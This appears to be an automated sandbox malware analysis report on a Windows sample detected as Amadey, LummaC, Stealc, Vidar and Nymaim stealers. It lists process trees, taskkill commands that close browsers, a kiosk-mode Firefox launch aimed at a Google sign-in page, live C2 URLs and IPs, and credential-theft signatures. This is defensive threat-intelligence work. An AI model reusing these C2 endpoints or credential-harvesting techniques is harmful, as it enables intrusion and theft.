Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1568907
MD5: 549b91abce102d3f86f3baea12da44cf
SHA1: 751694b6a55efb068eb998c5881e78d5d51fccf6
SHA256: 2c652a9034ebd3fbd6d504e140d9b68ffc858e07679f61b58efef50c7536e6cd
Tags: exe, user-Bitsight

Detection

Amadey, Credential Flusher, LummaC Stealer, Nymaim, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Nymaim
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Drops PE files to the document folder of the user
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Monitors registry run keys for changes
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 549B91ABCE102D3F86F3BAEA12DA44CF)
    • chrome.exe (PID: 7604 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7868 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2304,i,13957326758285335297,13387350500971898987,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • msedge.exe (PID: 3784 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="" MD5: BF154738460E4AB1D388970E1AB13FAB)
      • msedge.exe (PID: 876 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2280,i,12676847085568592327,10287468504227214058,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • cmd.exe (PID: 4592 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\EBFBFBFIIJ.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • EBFBFBFIIJ.exe (PID: 672 cmdline: "C:\Users\user\Documents\EBFBFBFIIJ.exe" MD5: 03FD571125408D973DA12445B72683F8)
        • skotes.exe (PID: 7804 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 03FD571125408D973DA12445B72683F8)
          • rhnew.exe (PID: 6536 cmdline: "C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe" MD5: F7286FEF9317FE91E24CDA721EC0BE81)
          • e6d73861f4.exe (PID: 3540 cmdline: "C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe" MD5: 872445F439140F8B8DB73EC546971CC9)
          • fc1511c233.exe (PID: 3636 cmdline: "C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe" MD5: 4EB2DA97A1AB9E042EB27A0B7AAC7C82)
          • 6ae2430bb1.exe (PID: 5396 cmdline: "C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe" MD5: 549B91ABCE102D3F86F3BAEA12DA44CF)
          • 1b3b76c439.exe (PID: 7712 cmdline: "C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe" MD5: 24446188A72C828117E1E29423CCBDAD)
            • taskkill.exe (PID: 4488 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
              • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 5032 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
              • conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 4828 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
              • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 8004 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
              • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 7820 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
              • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • firefox.exe (PID: 7524 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • msedge.exe (PID: 3320 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8172 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1988,i,4276003573003532254,7619762625833500772,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
  • fc1511c233.exe (PID: 6484 cmdline: "C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe" MD5: 4EB2DA97A1AB9E042EB27A0B7AAC7C82)
  • skotes.exe (PID: 7356 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 03FD571125408D973DA12445B72683F8)
  • firefox.exe (PID: 5264 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • firefox.exe (PID: 5204 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • 6ae2430bb1.exe (PID: 6464 cmdline: "C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe" MD5: 549B91ABCE102D3F86F3BAEA12DA44CF)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Nymaim
Description: Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
{"C2 url": ["covery-mover.biz", "formy-spill.biz", "dwell-exclaim.biz", "dare-curbys.biz", "zinc-sneark.biz", "atten-supporse.biz", "print-vexer.biz", "impend-differ.biz", "se-blurry.biz"], "Build id": "LOGS11--LiveTraffic"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
{"C2 addresses": ["92.63.197.221", "92.63.197.221", "92.63.197.221"]}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000001A.00000002.3429190490.0000000000E3A000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x1738:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001C.00000002.3259318138.00000000008B1000.00000040.00000001.01000000.00000011.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0000001B.00000003.3341908004.000000000149C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000030.00000003.3348999903.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
(31 further entries not shown)

Source | Rule | Description | Author | Strings
26.2.e6d73861f4.exe.400000.0.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
26.2.e6d73861f4.exe.400000.0.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
26.2.e6d73861f4.exe.4b30e67.1.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
26.3.e6d73861f4.exe.4cf0000.0.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
34.2.skotes.exe.880000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
(2 further entries not shown)

                          System Summary

Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7804, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fc1511c233.exe
Source: Process started | Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7276, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 7604, ProcessName: chrome.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7804, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fc1511c233.exe

                          AV Detection

                          Source: file.exe | Avira: detected
                          Source: https://dare-curbys.biz/ | Avira URL Cloud: Label: malware
                          Source: http://185.215.113.206/ul | Avira URL Cloud: Label: malware
                          Source: http://185.215.113.206/c4becf79229cb002.phpuS | Avira URL Cloud: Label: malware
                          Source: https://atten-supporse.biz/apiMv | Avira URL Cloud: Label: malware
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe | Avira: detection malicious, Label: HEUR/AGEN.1320706
                          Source: 0000001C.00000002.3262194656.000000000140E000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
                          Source: 00000016.00000002.3419500975.0000000000881000.00000040.00000001.01000000.0000000D.sdmp | Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                          Source: 26.2.e6d73861f4.exe.400000.0.raw.unpack | Malware Configuration Extractor: Nymaim {"C2 addresses": ["92.63.197.221", "92.63.197.221", "92.63.197.221"]}
                          Source: fc1511c233.exe.3636.27.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["covery-mover.biz", "formy-spill.biz", "dwell-exclaim.biz", "dare-curbys.biz", "zinc-sneark.biz", "atten-supporse.biz", "print-vexer.biz", "impend-differ.biz", "se-blurry.biz"], "Build id": "LOGS11--LiveTraffic"}
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe | ReversingLabs: Detection: 36%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe | ReversingLabs: Detection: 44%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe | ReversingLabs: Detection: 44%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe | ReversingLabs: Detection: 36%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe | ReversingLabs: Detection: 21%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\rhnew[1].exe | ReversingLabs: Detection: 54%
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe | ReversingLabs: Detection: 54%
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe | ReversingLabs: Detection: 44%
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | ReversingLabs: Detection: 36%
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | ReversingLabs: Detection: 36%
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | ReversingLabs: Detection: 21%
                          Source: C:\Users\user\AppData\Local\Temp\1012283001\f9882ce6c1.exe | ReversingLabs: Detection: 44%
                          Source: file.exe | ReversingLabs: Detection: 36%
                          Source: file.exe | Virustotal: Detection: 40%
                          Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe | Joe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe | Joe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe | Joe Sandbox ML: detected
                          Source: file.exe | Joe Sandbox ML: detected
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmp | String decryptor: impend-differ.biz
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmp | String decryptor: print-vexer.biz
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmp | String decryptor: dare-curbys.biz
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmp | String decryptor: covery-mover.biz
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmp | String decryptor: formy-spill.biz
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmp | String decryptor: dwell-exclaim.biz
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmp | String decryptor: zinc-sneark.biz
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmp | String decryptor: se-blurry.biz
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmp | String decryptor: atten-supporse.biz
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmp | String decryptor: TeslaBrowser/5.5
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmp | String decryptor: - Screen Resoluton:
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmp | String decryptor: - Physical Installed Memory:
                          Source: 00000020.00000002.3320488949.0000000000E91000.00000040.00000001.01000000.00000010.sdmp | String decryptor: Workgroup: -
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6C986C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,0_2_6C986C80
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6CADA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,0_2_6CADA9A0
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6CAD44C0 PK11_PubEncrypt,0_2_6CAD44C0
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6CAA4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,0_2_6CAA4420
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6CAD4440 PK11_PrivDecrypt,0_2_6CAD4440
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6CB225B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,0_2_6CB225B0
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6CABE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,0_2_6CABE6E0
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6CAB8670 PK11_ExportEncryptedPrivKeyInfo,0_2_6CAB8670
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6CADA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,0_2_6CADA650
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6CAFA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,0_2_6CAFA730
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6CB00180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,0_2_6CB00180
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6CAD43B0 PK11_PubEncryptPKCS1,PR_SetError,0_2_6CAD43B0
                          Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: unknown | HTTPS traffic detected: 172.67.181.44:443 -> 192.168.2.6:49945 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50002 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50009 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50018 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50024 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50030 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50039 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50054 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50069 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50078 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50079 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50082 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50083 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50084 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50085 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50088 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50089 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.6:50090 version: TLS 1.2
                          Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2761247408.000000006C9ED000.00000002.00000001.01000000.0000000A.sdmp
                          Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2761636482.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp
                          Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2761636482.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp
                          Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2761247408.000000006C9ED000.00000002.00000001.01000000.0000000A.sdmp
                          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                          Source: firefox.exe | Memory has grown: Private usage: 1MB later: 184MB

                          Networking

